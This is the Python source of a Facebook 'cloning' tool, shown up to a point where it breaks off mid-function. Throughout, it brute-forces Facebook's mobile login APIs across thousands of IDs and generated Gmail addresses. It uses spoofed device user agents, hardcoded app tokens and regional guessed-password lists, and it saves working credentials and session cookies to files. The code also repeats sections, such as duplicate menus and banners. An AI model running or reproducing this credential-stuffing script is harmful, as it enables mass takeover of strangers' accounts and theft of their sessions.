# [ SYSTEM V30.0 - BY MOHA AL-SHALFAWI ]
# PROFESSIONAL CLONING TOOL 

Fbks=('com.facebook.adsmanager','com.facebook.lite','com.facebook.orca','com.facebook.katana')

try:
    import os,requests,json,time,re,random,sys,uuid,string,subprocess
    from string import *
    from concurrent.futures import ThreadPoolExecutor as tred
    from bs4 import BeautifulSoup as sop
except ModuleNotFoundError: 
    print('\n [!] Installing missing modules ...')
    os.system('pip install requests bs4 futures==2 > /dev/null')
    os.system('python ' + sys.argv[0])

# --- [ COLORS XN ] ---
G = '\x1b[1;92m' # Green
Y = '\x1b[1;93m' # Yellow
W = '\x1b[1;97m' # White
R = '\x1b[1;91m' # Red

print(f'{G}[•] Welcome to MOHA AL-SHALFAWI System')
# يمكنك تغيير الرابط هنا لمجموعتك أو حسابك الخاص
os.system('xdg-open https://www.facebook.com/mouhamed20888')

android_models=[]
try:
    xx = requests.get('https://raw.githubusercontent.com/Ramxantanha/data/main/strings.txt').text.splitlines()
    for line in xx:
        android_models.append(line)
except:pass

usr=[]
try:
    xd=requests.get('https://raw.githubusercontent.com/SHaYanxALyan/SA/main/sk.txt').text.splitlines()
    for us in xd:
        usr.append(us)
except: pass

# --- [ مصفوفة الموديلات الكاملة ] ---
gt_list = ['GT-1015','GT-1020','GT-1030','GT-1035','GT-1040','GT-1045','GT-1050','GT-1240','GT-1440','GT-1450','GT-18190','GT-18262','GT-19060I','GT-19082','GT-19083','GT-19105','GT-19152','GT-19192','GT-19300','GT-19505','GT-2000','GT-20000','GT-200s','GT-3000','GT-414XOP','GT-6918','GT-7010','GT-7020','GT-7030','GT-7040','GT-7050','GT-7100','GT-7105','GT-7110','GT-7205','GT-7210','GT-7240R','GT-7245','GT-7303','GT-7310','GT-7320','GT-7325','GT-7326','GT-7340','GT-7405','GT-7550	5GT-8005','GT-8010','GT-81','GT-810','GT-8105','GT-8110','GT-8220S','GT-8410','GT-9300','GT-9320','GT-93G','GT-A7100','GT-A9500','GT-ANDROID','GT-B2710','GT-B5330','GT-B5330B','GT-B5330L','GT-B5330ZKAINU','GT-B5510','GT-B5512','GT-B5722','GT-B7510','GT-B7722','GT-B7810','GT-B9150','GT-B9388','GT-C3010','GT-C3262','GT-C3310R','GT-C3312','GT-C3312R','GT-C3313T','GT-C3322','GT-C3322i','GT-C3520','GT-C3520I','GT-C3592','GT-C3595','GT-C3782','GT-C6712','GT-E1282T','GT-E1500','GT-E2200','GT-E2202','GT-E2250','GT-E2252','GT-E2600','GT-E2652W','GT-E3210','GT-E3309','GT-E3309I','GT-E3309T','GT-G530H','GT-g900f','GT-G930F','GT-H9500','GT-I5508','GT-I5801','GT-I6410','GT-I8150','GT-I8160OKLTPA','GT-I8160ZWLTTT','GT-I8258','GT-I8262D','GT-I8268','GT-I8505','GT-I8530BAABTU','GT-I8530BALCHO','GT-I8530BALTTT','GT-I8550E','GT-i8700','GT-I8750','GT-I900','GT-I9008L','GT-i9040','GT-I9080E','GT-I9082C','GT-I9082EWAINU','GT-I9082i','GT-I9100G','GT-I9100LKLCHT','GT-I9100M','GT-I9100P','GT-I9100T','GT-I9105UANDBT','GT-I9128E','GT-I9128I','GT-I9128V','GT-I9158P','GT-I9158V','GT-I9168I','GT-I9192I','GT-I9195H','GT-I9195L','GT-I9250','GT-I9303I','GT-I9305N','GT-I9308I','GT-I9505G','GT-I9505X','GT-I9507V','GT-I9600','GT-m190','GT-M5650','GT-mini','GT-N5000S','GT-N5100','GT-N5105','GT-N5110','GT-N5120','GT-N7000B','GT-N7005','GT-N7100T','GT-N7102','GT-N7105','GT-N7105T','GT-N7108','GT-N7108D','GT-N8000','GT-N8005','GT-N8010','GT-N8020','GT-N9000','GT-N9505','GT-P1000CWAXSA','GT-P1000M','GT-P1000T','GT-P1010','GT-P3100B','GT-P3105','GT-P3108','GT-P3110','GT-P5100','GT-P5200','GT-P5210XD1','GT-P5220','GT-P6200','GT-P6200L','GT-P6201','GT-P6210','GT-P6211','GT-P6800','GT-P7100','GT-P7300','GT-P7300B','GT-P7310','GT-P7320','GT-P7500D','GT-P7500M','GT-P7500R','GT-P7500V','GT-P7501','GT-P7511','GT-S3330','GT-S3332','GT-S3333','GT-S3370','GT-S3518','GT-S3570','GT-S3600i','GT-S3650','GT-S3653W','GT-S3770K','GT-S3770M','GT-S3800W','GT-S3802','GT-S3850','GT-S5220','GT-S5220R','GT-S5222','GT-S5230','GT-S5230W','GT-S5233T','GT-s5233w','GT-S5250','GT-S5253','GT-s5260','GT-S5280','GT-S5282','GT-S5283B','GT-S5292','GT-S5300','GT-S5300L','GT-S5301','GT-S5301B','GT-S5301L','GT-S5302','GT-S5302B','GT-S5303','GT-S5303B','GT-S5310','GT-S5310B','GT-S5310C','GT-S5310E','GT-S5310G','GT-S5310I','GT-S5310L','GT-S5310M','GT-S5310N','GT-S5312','GT-S5312B','GT-S5312C','GT-S5312L','GT-S5330','GT-S5360','GT-S5360B','GT-S5360L','GT-S5360T','GT-S5363','GT-S5367','GT-S5369','GT-S5380','GT-S5380D','GT-S5500','GT-S5560','GT-S5560i','GT-S5570B','GT-S5570I','GT-S5570L','GT-S5578','GT-S5600','GT-S5603','GT-S5610','GT-S5610K','GT-S5611','GT-S5620','GT-S5670','GT-S5670B','GT-S5670HKBZTA','GT-S5690','GT-S5690R','GT-S5830','GT-S5830D','GT-S5830G','GT-S5830i','GT-S5830L','GT-S5830M','GT-S5830T','GT-S5830V','GT-S5831i','GT-S5838','GT-S5839i','GT-S6010','GT-S6010BBABTU','GT-S6012','GT-S6012B','GT-S6102','GT-S6102B','GT-S6293T','GT-S6310B','GT-S6310ZWAMID','GT-S6312','GT-S6313T','GT-S6352','GT-S6500','GT-S6500D','GT-S6500L','GT-S6790','GT-S6790L','GT-S6790N','GT-S6792L','GT-S6800','GT-S6800HKAXFA','GT-S6802','GT-S6810','GT-S6810B','GT-S6810E','GT-S6810L','GT-S6810M','GT-S6810MBASER','GT-S6810P','GT-S6812','GT-S6812B','GT-S6812C','GT-S6812i','GT-S6818','GT-S6818V','GT-S7230E','GT-S7233E','GT-S7250D','GT-S7262','GT-S7270','GT-S7270L','GT-S7272','GT-S7272C','GT-S7273T','GT-S7278','GT-S7278U','GT-S7390','GT-S7390G','GT-S7390L','GT-S7392','GT-S7392L','GT-S7500','GT-S7500ABABTU','GT-S7500ABADBT','GT-S7500ABTTLP','GT-S7500CWADBT','GT-S7500L','GT-S7500T','GT-S7560','GT-S7560M','GT-S7562','GT-S7562C','GT-S7562i','GT-S7562L','GT-S7566','GT-S7568','GT-S7568I','GT-S7572','GT-S7580E','GT-S7583T','GT-S758X','GT-S7592','GT-S7710','GT-S7710L','GT-S7898','GT-S7898I','GT-S8500','GT-S8530','GT-S8600','GT-STB919','GT-T140','GT-T150','GT-V8a','GT-V8i','GT-VC818','GT-VM919S','GT-W131','GT-W153','GT-X831','GT-X853','GT-X870','GT-X890','GT-Y8750']

# --- [ GENERATING 30,000 USER AGENTS ] ---
ugen=[]
for xd in range(10000):
    aa='Mozilla/5.0 (Linux; U; Android'
    b=random.choice(['6','7','8','9','10','11','12','13'])
    c=f' en-us; {random.choice(gt_list)}'
    g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
    h=random.randrange(73,100)
    i='0'
    j=random.randrange(4200,4900)
    k=random.randrange(40,150)
    l='Mobile Safari/537.36'
    uaku2=f'{aa} {b}; {c}) {g}{h}.{i}.{j}.{k} {l}'
    ugen.append(uaku2)

for agent in range(10000):
    aa='Mozilla/5.0 (Linux; Android 6.0.1;'
    b=random.choice(['6','7','8','9','10','11','12','13'])
    c='en-us; 10; T-Mobile myTouch 3G Slide Build/GRI40)I148V)'
    d=random.choice(string.ascii_uppercase)
    e=random.randrange(1, 999)
    f=random.choice(string.ascii_uppercase)
    g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.99'
    h=random.randrange(73,100)
    i='0'
    j=random.randrange(4200,4900)
    k=random.randrange(40,150)
    l='Mobile Safari/533.1'
    fullagnt=(f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}')
    ugen.append(fullagnt)

rug=[]
for nt in range(10000):
    rr=random.randint
    aZ=random.choice(string.ascii_uppercase)
    rx=random.randrange(1, 999)
    xx=f"Mozilla/5.0 (Windows NT 10.0; {str(rr(9,11))}; Win64; x64){str(aZ)}{str(rx)}{str(aZ)}) AppleWebKit/537.36 (KHTML, like Gecko){str(rr(99,149))}.0.{str(rr(4500,4999))}.{str(rr(35,99))} Chrome/{str(rr(99,175))}.0.{str(rr(0,5))}.{str(rr(0,5))} Safari/537.36"
    rug.append(xx)

# --- [ LOGO & IDENTITY ] ---
logo = f"""{G}
  __  __  ____  _    _          
 |  \/  |/ __ \| |  | |   /\    
 | \  / | |  | | |__| |  /  \   
 | |\/| | |  | |  __  | / /\ \  
 | |  | | |__| | |  | |/ ____ \ 
 |_|  |_|\____/|_|  |_/_/    \_\ 
{W}--------------------------------------------------
{G}[+] DEVELOPER : {W}MOHA AL-SHALFAWI (XN)
{G}[+] STATUS    : {Y}SMART SYSTEM V30.0
{G}[+] UGEN SIZE : {W}{len(ugen)} AGENTS LOADED
{W}--------------------------------------------------"""

def clear():
    os.system('clear')
    print(logo)
#new ua
# [ SYSTEM V30.0 - BY MOHA AL-SHALFAWI ]
# PROFESSIONAL DEVICE DATA & APK CHECKER - PUBLIC VERSION

import os, requests, json, time, re, random, sys, uuid, string, subprocess
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup

# --- [ COLORS XN ] ---
A = '\x1b[1;97m' 
B = '\x1b[1;96m' 
C = '\x1b[1;91m' 
D = '\x1b[1;92m'
M = '\033[1;31m'
H = '\033[1;32m'
N = '\x1b[1;37m'	
E = '\x1b[1;93m' 

# --- [ GENERATING USER AGENTS ] ---
ugen=[]
for agent in range(10000):
    aa='Mozilla/5.0 (Linux; Android 6.0.1;'
    b=random.choice(['6','7','8','9','10','11','12'])
    c='en-us; 10; T-Mobile myTouch 3G Slide Build/'
    d=random.choice(string.ascii_uppercase)
    e=random.randrange(1, 999)
    f=random.choice(string.ascii_uppercase)
    g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.99'
    h=random.randrange(73,100)
    i='0'
    j=random.randrange(4200,4900)
    k=random.randrange(40,150)
    l='Mobile Safari/533.1'
    fullagnt=(f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}')
    ugen.append(fullagnt)

# --- [ GET DYNAMIC DEVICE DATA FOR PUBLIC USE ] ---
try:
    android_version = subprocess.check_output('getprop ro.build.version.release',shell=True).decode('utf-8').replace('\n','')
    model = subprocess.check_output('getprop ro.product.model',shell=True).decode('utf-8').replace('\n','')
    build = subprocess.check_output('getprop ro.build.id',shell=True).decode('utf-8').replace('\n','')
    fbmf = subprocess.check_output('getprop ro.product.manufacturer',shell=True).decode('utf-8').replace('\n','')
    fbbd = subprocess.check_output('getprop ro.product.brand',shell=True).decode('utf-8').replace('\n','')
    fbca = subprocess.check_output('getprop ro.product.cpu.abilist',shell=True).decode('utf-8').replace(',',':').replace('\n','')
    fbdm = '{density=2.0,height='+subprocess.check_output('getprop ro.hwui.text_large_cache_height',shell=True).decode('utf-8').replace('\n','')+',width='+subprocess.check_output('getprop ro.hwui.text_large_cache_width',shell=True).decode('utf-8').replace('\n','')+'}'
except:
    # قيم افتراضية عامة في حال فشل النظام في التعرف على الجهاز
    android_version = "12"; model = "M2101K6G"; build = "RKQ1.201112.002"; fbmf = "Xiaomi"; fbbd = "Redmi"; fbca = "arm64-v8a:armeabi-v7a:armeabi"; fbdm = "{density=3.0,height=2400,width=1080}"

# --- [ SIM ID & OPERATOR LOGIC ] ---
sim_id = ''
try:
    fbcr_raw = subprocess.check_output('getprop gsm.operator.alpha',shell=True).decode('utf-8').strip().split(',')
    if len(fbcr_raw) > 0:
        fbcr = fbcr_raw[0]
        sim_id = fbcr
    else:
        fbcr = 'Zong'
        sim_id = fbcr
except:
    fbcr = "Zong"
    sim_id = "Zong"

device = {
    'android_version':android_version,
    'model':model,
    'build':build,
    'fblc':'en_GB',
    'fbmf':fbmf,
    'fbbd':fbbd,
    'fbdv':model,
    'fbsv':android_version,
    'fbca':fbca,
    'fbdm':fbdm}

# --- [ IDENTITY & INTERFACE ] ---
logo=(f"""{C}
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$                                       $
$   $$\      $$\  $$$$$$\  $$\   $$\   $
$   $$$\    $$$ |$$  __$$\ $$ |  $$ |  $
$   $$$$\  $$$$ |$$ /  $$ |$$ |  $$ |  $
$   $$\$$\$$ $$ |$$ |  $$ |$$$$$$$$ |  $
$   $$ \$$$  $$ |$$ |  $$ |$$  __$$ |  $
$   $$ |\$  /$$ |$$ |  $$ |$$ |  $$ |  $
$   $$ | \_/ $$ | $$$$$$  |$$ |  $$ |  $
$   \__|     \__| \______/ \__|  \__|  $
$                                       $
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
{A}--------------------------------------------------
{D}[~] AUTHOR   : {A}MOHA AL-SHALFAWI
{D}[~] STATUS   : {E}VERSION 30.0 (PUBLIC)
{D}[~] LOADER   : {E}DYNAMIC DEVICE SYSTEM
{A}----------------------------------------------""")

def linex():
    print(f'{A}----------------------------------------------')

def clear():
    os.system('clear')
    print(logo)

# --- [ CHECK ACTIVE/EXPIRED APKS ] ---
def cek_apk(session,coki):
    try:
        w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies={"cookie":coki}).text
        sop = BeautifulSoup(w,"html.parser")
        x = sop.find("form",method="post")
        if x:
            game = [i.text for i in x.find_all("h3")]
            if len(game)==0:
                print(f'\r{N} [{H}•{N}] {H}Active Apks Not Found')
            else:
                print(f'\r{A} [•]{H} Active Apks & Web 👇 ')
                for i in range(len(game)):
                    print(f"\r{D} [{i+1}] {game[i].replace('Ditambahkan pada',' Ditambahkan pada')}")
    except:pass

# --- [ SYSTEM VARIABLES ] ---
loop=0
oks=[]
cps=[]
pcp=[]
id=[]
tokenku=[]
def menu():
    clear()
#	linex()
def menu():
    clear()
    print(f' {G}[1]{W} File Cloning')
    print(f' {G}[2]{W} Random Cloning')
    print(f' {G}[3]{W} Gmail Cloning')
    print(f' {G}[4]{W} Contact on WhatsApp')
    print(f' {G}[0]{W} Exit Menu')
    linex()
    xd=input(f' {G}[?] {W}Choose an option: ')
    
    if xd in ['1','01']:
        clear()
        print(f' {Y}[!] Put file example: /sdcard/File.txt etc..')
        linex()
        file = input(f' {G}[+] {W}Put file path: ')
        try:
            fo = open(file,'r').read().splitlines()
        except FileNotFoundError:
            print(f' {R}[!] File location not found ')
            time.sleep(2)
            menu()
        
        clear()
        print(f' {G}[~] {W}All methods are currently active')
        linex()
        print(f' {Y}[1]{W} Method (Mix IDs) {G}(Fast)')
        print(f' {Y}[2]{W} Method (Mix IDs) {G}(Best)')
        print(f' {Y}[3]{W} Method (With Cookies) {G}(V.Fast)')
        print(f' {Y}[4]{W} Method (New IDs) {G}(Best)')
        print(f' {Y}[5]{W} Method (New IDs) {R}(Slow)')
        print(f' {Y}[6]{W} Method (New IDs)')
        print(f' {Y}[7]{W} Method (New IDs)')
        print(f' {Y}[8]{W} Method (New IDs)')
        linex()
        mthd=input(f' {G}[?] {W}Choose Method: ')
        linex()
        
        plist = []
        try:
            ps_limit = int(input(f' {G}[+] {W}How many passwords to add? : '))
        except:
            ps_limit = 1
            
        clear()
        print(f' {Y}[!] Example: first last, first123, first12345')
        linex()
        for i in range(ps_limit):
            plist.append(input(f' {G}[+] {W}Put password {i+1}: '))
            
        clear()
        print(f' {G}[?] {W}Do you want to show CP accounts? (y/n)')
        linex()
        cx=input(f' {G}[?] {W}Choose: ')
        if cx in ['y','Y','yes','Yes','1']:
            pcp.append('y')
        else:
            pcp.append('n')
            
        with tred(max_workers=30) as crack_submit:
            clear()
            total_ids = str(len(fo))
            print(f' {G}[+] {W}Total Account IDs : {G}'+total_ids)
            print(f' {G}[+] {W}The process is running in the background...')
            linex()
            for user in fo:
                try:
                    ids,names = user.split('|')
                    passlist = plist
                    if mthd in ['1','01']:
                        crack_submit.submit(api1,ids,names,passlist)
                    elif mthd in ['2','02']:
                        crack_submit.submit(api2,ids,names,passlist)
                    elif mthd in ['3','03']:
                        crack_submit.submit(api3,ids,names,passlist)
                    elif mthd in ['4','04']:
                        crack_submit.submit(api4,ids,names,passlist)
                    elif mthd in ['5','05']:
                        crack_submit.submit(api5,ids,names,passlist)
                    elif mthd in ['6','06']:
                        crack_submit.submit(api6,ids,names,passlist)
                    elif mthd in ['7','07']:
                        crack_submit.submit(api7,ids,names,passlist)
                    elif mthd in ['8','08']:
                        crack_submit.submit(api8,ids,names,passlist)
                except:pass
                
        linex()
        print(f' {G}[√] {W}The process has been completed')
        print(f' {G}[+] {W}Total OK/CP: {G}'+str(len(oks))+f'{W}/{R}'+str(len(cps)))
        linex()
        input(f' {G}[?] {W}Press enter to back ')
        menu()

    elif xd in ['2','02']:
        pak() # تأكد من وجود دالة الـ Random لاحقاً
    elif xd in ['3','03']:
        gmail() # تأكد من وجود دالة الـ Gmail لاحقاً
    elif xd in ['4','04']:
        os.system('xdg-open https://wa.me/+213XXXXXXX') # ضع رقمك هنا
        menu()
    elif xd in ['0','00']:
        exit(f' {G}[!] {W}Thanks for using MOHA SYSTEM')
    else:
        print(f' {R}[!] Wrong Option')
        time.sleep(1)
        menu()
#create()
				#dz._login()
def pak():
    user=[]
    clear()
    print(f' {Y}[!] Code example: 0306, 0315, 0335, 0345')
    code = input(f' {G}[+] {W}Put code: ')
    try:
        limit = int(input(f' {Y}[!] Example: 2000, 5000, 10000\n {G}[+] {W}Put limit: '))
    except ValueError:
        limit = 5000
    clear()
    print(f' {G}[1]{W} Method (Best)')
    print(f' {G}[2]{W} Method (V-Fast)')
    print(f' {G}[3]{W} Method (V-Best)')
    print(f' {G}[4]{W} Method (With Cookies)')
    print(f' {G}[5]{W} Method (Slow)')
    print(f' {G}[6]{W} Method (Slow)')
    linex()
    mthd = input(f' {G}[?] {W}Choose: ')
    clear()
    print(f' {G}[1]{W} Clone with 7+11 digit pass (V-Fast)')
    print(f' {G}[2]{W} Clone with auto pass (Best)')
    print(f' {G}[3]{W} Clone with auto pass (Fast)')
    print(f' {G}[4]{W} Clone with auto pass (Normal)')
    print(f' {G}[5]{W} Clone with auto pass (Slow-Best)')
    print(f' {G}[6]{W} Clone with auto pass (Slow-Fast)')
    print(f' {G}[7]{W} Clone with auto pass (Only-BD)')
    print(f' {G}[8]{W} Clone with auto pass (Only-AFG)')
    linex()
    pcs = input(f' {G}[?] {W}Select: ')
    
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(7))
        user.append(nmp)
        
    with tred(max_workers=30) as SK:	
        clear()
        tl = str(len(user))
        print(f' {G}[+] {W}Total IDs     : {G}'+tl)
        print(f' {G}[+] {W}Choice Code   : {G}'+code)
        print(f' {G}[+] {W}Process is running in the background...')
        linex()
        for psx in user:
            ids = code+psx
            # --- [ نفس نمط تخمينك الأصلي ] ---
            if pcs in ['1','01']:
                passlist = [psx,ids,'khankhan','khan1122','ali12345','khanbaba','pakistan','khan12345','ali1122','khankhan12345','khan','baloch','pubg','pubg1122']
            elif pcs in ['2','02']:
                passlist = [psx,ids,'khankhan','khan1122','ali12345','pakistan','khan12345','ali1122','baloch12345','khan','baloch','khan','pubg','pubg1122','malik786']
            elif pcs in ['3','03']:
                passlist = [psx,ids,'pubg','pubg1122','pubgking','pubg12','pubg123','pubg1234']
            elif pcs in ['4','04']:
                passlist = [psx,ids,'khankhan','khan1122','khan1234','khan123']
            elif pcs in ['5','05']:
                passlist = [psx,ids]
            elif pcs in ['6','06']:
                passlist = [psx,ids,'khankhan','khan1122','786786','ali786','khan123','khan12','pakistan','ali123','khanbaba']
            elif pcs in ['7','07']:
                passlist = [psx,ids,'Bangladesh','bangladesh','i love you','iloveyou','free fire','freefire']
            elif pcs in ['8','08']:
                passlist = [psx,ids,'afghan','afghan12345','afghan123','600700','afghanistan','afghan1122','500500','100200','10002000','900900','kabul123']
            
            if mthd in ['1','01']:
                SK.submit(trt1,ids,passlist)
            elif mthd in ['2','02']:
                SK.submit(trt2,ids,passlist)
            elif mthd in ['3','03']:
                SK.submit(trt3,ids,passlist)
            elif mthd in ['4','04']:
                SK.submit(trt4,ids,passlist)
            elif mthd in ['5','05']:
                SK.submit(trt5,ids,passlist)
            elif mthd in ['6','06']:
                SK.submit(trt6,ids,passlist)

    linex()
    print(f' {G}[√] {W}Process Completed')
    print(f' {G}[+] {W}Total OK/CP: {G}{len(oks)}{W}/{R}{len(cps)}')
    linex()
    input(f' {G}[?] {W}Press Enter to Back ')
    menu()

def gmail():
    os.system('rm -rf .re.txt')
    clear()
    print(f' {Y}[!] Example: ramzan, ali, sajjad')
    linex()
    first = input(f' {G}[+] {W}Put first name: ')
    linex()
    last = input(f' {G}[+] {W}Put last name: ')
    linex()
    domain = input(f' {G}[+] {W}Domain (e.g @gmail.com): ')
    linex()
    try:
        limit=int(input(f' {G}[+] {W}Put limit: '))
    except ValueError:
        limit = 5000
    clear()
    print(f' {G}[1]{W} Only name password')
    print(f' {G}[2]{W} Name + digit password')
    print(f' {G}[3]{W} Capital name password')
    print(f' {G}[4]{W} Auto all passwords')
    linex()
    pxc = input(f' {G}[?] {W}Choose: ')
    clear()
    print(f' {G}[~] {W}Generating Gmails...')
    
    # --- [ توليد الجيميلات بنفس نمطك ] ---
    lists = ['3','4']
    for xd in range(limit):
        lchoice = random.choice(lists)
        mail_num = ''.join(random.choice(string.digits) for _ in range(int(lchoice)))
        full_mail = first.lower() + last.lower() + mail_num + domain
        with open('.re.txt','a') as f:
            f.write(full_mail + '|' + first + ' ' + last + '\n')
            
    fo = open('.re.txt', 'r').read().splitlines()
    with tred(max_workers=30) as SK:
        total = str(len(fo))
        clear()
        print(f' {G}[+] {W}Total IDs     : {G}'+total)
        print(f' {G}[+] {W}Process is running in the background...')
        linex()
        for user in fo:
            ids, names = user.split('|')
            first_name = names.rsplit(' ')[0]
            try: last_name = names.rsplit(' ')[1]
            except: last_name = 'Khan'
            fs = first_name.lower(); ls = last_name.lower()
            
            if pxc in ['1','01']:
                passlist = [fs+ls, fs+' '+ls, fs]
            elif pxc in ['2','02']:
                passlist = [fs+ls, fs+' '+ls, fs+'123', fs+'12345', fs+'1122']
            elif pxc in ['3','03']:
                passlist = [first_name+last_name, first_name+' '+last_name, first_name+'123']
            else:
                passlist = [fs+ls, fs+' '+ls, first_name+last_name, first_name+' '+last_name, fs+'123', fs+'786', fs+'12345', fs+'1122']
            
            # الربط مع الميثود
            SK.submit(trt1, ids, passlist) 

    linex()
    print(f' {G}[√] {W}Process Completed')
    input(f' {G}[?] {W}Press Enter to Back ')
    menu()
#b-api method
#1method
def api1(ids,names,passlist):
    try:
        global oks,loop,cps
        # ستايل العداد (Status Bar) بنمط XN
        sys.stdout.write(f'\r\r{W} [MOHA-M1] {G}%s{W}|{G}OK:-%s {W}'%(loop,len(oks)))
        sys.stdout.flush()
        
        fn = names.split(' ')[0]
        try:
            ln = names.split(' ')[1]
        except:
            ln = fn
            
        for pw in passlist:
            pas = pw.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',names).replace('name',names.lower())
            
            # --- [ GENERATING DYNAMIC UA ] ---
            application_version = str(random.randint(111,555))+'.0.0.'+str(random.randrange(9,49))+str(random.randint(111,555))
            application_version_code = str(random.randint(000000000,999999999))
            __iam_genius = random.choice(android_models)
            phone_model = __iam_genius.split('|')[0]
            phone_company = __iam_genius.split('|')[1]
            dvlk = random.choice(usr)
            
            # بناء الهيدر الاحترافي
            ua_string = f'{str(dvlk)} [FBAN/FB4A;FBAV/{str(application_version)};FBPN/com.facebook.katana;FBLC/en_PK;FBCR/null;FBBV/{str(application_version_code)};FBMF/{str(phone_company)};FBBD/{str(phone_company)};FBDV/{str(phone_company)};FBSV/8.1.0;;FBDM/'+'{density=2.75,height=1440,width=720};]'
            
            device_family_id = str(uuid.uuid4())
            adid = str(uuid.uuid4())
            machine_id = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits + '_') for _ in range(24))
            
            data = {
                'adid':adid,
                'format':'json',
                'device_id':device_family_id,
                'email':ids,
                'password':pas,
                'generate_analytics_claim':'1',
                'community_id':'','cpl':'true','try_num':'1',
                'family_device_id':device_family_id,
                'credentials_type':'device_based_login_password',
                'generate_session_cookies':'1',
                'error_detail_type':'button_with_disabled',
                'source':'device_based_login',
                'machine_id':machine_id,
                'login_location_accuracy_m':'1.0',
                'meta_inf_fbmeta':'',
                'advertiser_id':adid,
                'encrypted_msisdn':'',
                'currently_logged_in_userid':'0',
                'locale':'en_PK',
                'client_country_code':'PK',
                'method':'auth.login',
                'fb_api_req_friendly_name':'authenticate',
                'fb_api_caller_class':'com.facebook.account.login.protocol.Fb4aAuthHandler',
                'access_token':'350685531728|62f8ce9f74b12f84c123cc23437a4a32'}
            
            head = {
                'content-type':'application/x-www-form-urlencoded',
                'x-fb-sim-hni':str(random.randint(20000,40000)),
                'x-fb-connection-type':'unknown',
                'Authorization':'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32',
                'user-agent':ua_string,
                'x-fb-net-hni':str(random.randint(20000,40000)),
                'x-fb-connection-bandwidth':str(random.randint(20000000,30000000)),
                'x-fb-connection-quality':'EXCELLENT',
                'x-fb-friendly-name':'authenticate',
                'accept-encoding':'gzip, deflate',
                'x-fb-http-engine':'Liger'}
            
            url = 'https://b-api.facebook.com/method/auth.login'
            po = requests.post(url, data=data, headers=head, allow_redirects=False).text
            q = json.loads(po)
            
            if 'session_key' in q:
                # نتيجة ناجحة OK
                print(f'\r\r{G} [MOHA-OK] {ids} | {pas}{W}')
                open('/sdcard/MOHA-OK.txt','a').write(ids+'|'+pas+'\n')
                oks.append(ids)
                break
            elif 'www.facebook.com' in str(q.get('error_msg','')):
                # نتيجة CP
                if 'y' in pcp:
                    print(f'\r\r{Y} [MOHA-CP] {ids} | {pas}{W}')
                    open('/sdcard/MOHA-CP.txt','a').write(ids+'|'+pas+'\n')
                    cps.append(ids)
                    break
                else:
                    open('/sdcard/MOHA-CP.txt','a').write(ids+'|'+pas+'\n')
                    break
            else:
                continue
        loop+=1
    except requests.exceptions.ConnectionError:
        time.sleep(10)
    except Exception as e:
        pass
#m2
#b-graph method		
def api2(ids,names,passlist):
    try:
        global oks,loop,cps,sim_id
        # ستايل العداد الموحد XN
        sys.stdout.write(f'\r\r{W} [MOHA-M2] {G}%s{W}|{G}OK:-%s {W}'%(loop,len(oks)))
        sys.stdout.flush()
        
        fn = names.split(' ')[0]
        try: ln = names.split(' ')[1]
        except: ln = fn
            
        for pw in passlist:
            pas = pw.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',names).replace('name',names.lower())
            
            # استدعاء بيانات الجهاز الديناميكية (من دالة الجهاز السابقة)
            fbav = f'{random.randint(111,999)}.0.0.{random.randint(11,99)}.{random.randint(111,999)}'
            fbbv = str(random.randint(111111111,999999999))
            
            # بناء User-Agent احترافي ومتغير
            ua = f'Davik/2.1.0 (Linux; U; Android {device["android_version"]}; {device["model"]} Build/{device["build"]}) [FBAN/FB4A;FBAV/{fbav};FBBV/{fbbv};FBDM/' + '{density=2.75,width=720,height=1280};' + f'FBLC/en_US;FBCR/{sim_id};FBMF/{device["fbmf"]};FBBD/{device["fbbd"]};FBPN/com.facebook.katana;FBDV/{device["model"]};FBSV/{device["android_version"]};FBCA/{device["fbca"]};]'
            
            data = {
                "adid": str(uuid.uuid4()),
                "format": "json",
                "device_id": str(uuid.uuid4()),
                "cpl": "true",
                "family_device_id": str(uuid.uuid4()),
                "credentials_type": "device_based_login_password",
                "error_detail_type": "button_with_disabled",
                "source": "device_based_login",
                "email": ids,
                "password": pas,
                "access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32",
                "generate_session_cookies": "1",
                "meta_inf_fbmeta": "",
                "advertiser_id": str(uuid.uuid4()),
                "currently_logged_in_userid": "0",
                "locale": "en_US",
                "client_country_code": "US",
                "method": "auth.login",
                "fb_api_req_friendly_name": "authenticate",
                "fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
                "api_key": "882a8490361da98702bf97a021ddc14d"
            }
            
            headers = {
                "Content-Type": "application/x-www-form-urlencoded",
                "Host": "graph.facebook.com",
                "User-Agent": ua,
                "X-FB-Net-HNI": str(random.randint(20000, 40000)),
                "X-FB-SIM-HNI": str(random.randint(20000, 40000)),
                "X-FB-Connection-Type": "MOBILE.LTE",
                "X-Tigon-Is-Retry": "False",
                "x-fb-session-id": "nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62",
                "x-fb-device-group": "5120",
                "X-FB-Friendly-Name": "authenticate",
                "Accept-Encoding": "gzip, deflate",
                "X-FB-HTTP-Engine": "Liger",
                "Connection": "Keep-Alive"
            }
            
            url = 'https://b-graph.facebook.com/auth/login'
            twf_msg = 'Login approval'
            po = requests.post(url, data=data, headers=headers).json()
            
            if 'session_key' in po:
                # حالة النجاح OK مع استخراج الكوكيز
                print(f'\r\r{G} [MOHA-OK] {ids} | {pas}{W}')
                coki = ";".join(i["name"]+"="+i["value"] for i in po["session_cookies"])
                open('/sdcard/MOHA-OK.txt','a').write(ids+'|'+pas+'\n')
                open('/sdcard/MOHA-COKIE.txt','a').write(ids+'|'+pas+'|'+coki+'\n')
                oks.append(ids)
                break
            elif twf_msg in str(po):
